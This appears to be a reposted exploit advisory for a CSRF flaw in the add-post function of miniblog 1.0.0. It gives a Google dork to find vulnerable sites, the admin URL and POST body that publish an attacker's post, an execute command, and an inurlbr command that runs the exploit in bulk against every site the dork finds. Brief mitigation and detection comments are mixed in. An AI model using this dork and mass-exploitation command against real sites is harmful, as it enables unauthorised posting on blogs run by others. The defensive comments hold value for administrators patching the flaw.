# Vendor: http://www.spyka.net/scripts/php/miniblo
# Google Dork: intext:"Powered by miniblog" ext:php
# POC: http://{YOU_URL}/adm/admin.php?mode=add
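# REQUEST: send an HTTP POST to the URL above with the body shown on the next line.
# NOTE: the linked repository name labels this as a CSRF issue in miniblog 1.0.0 (add post).
#       The state-changing request appears to be accepted without a per-session anti-CSRF token;
#       whether adm/admin.php also checks for an authenticated admin session is not shown here
#       and should be confirmed on a test install.
# MITIGATION: require an authenticated admin session and a token bound to that session on every
#       state-changing request to adm/admin.php, and restrict access to the adm/ directory.
# DETECTION: review web logs for POSTs to adm/admin.php?mode=add with a missing or off-site
#       Referer, and check the post list for entries the administrators did not create.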
adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
------------------------------------------------------------------------------
# EXECUTE: php xpl.php -t http://target.us
# FILE_OUTPUT : miniblog_vuln.txt
# EXPLOIT MASS USE SCANNER INURLBR
php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
------------------------------------------------------------------------------
*/
ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL
sumber: Pastebin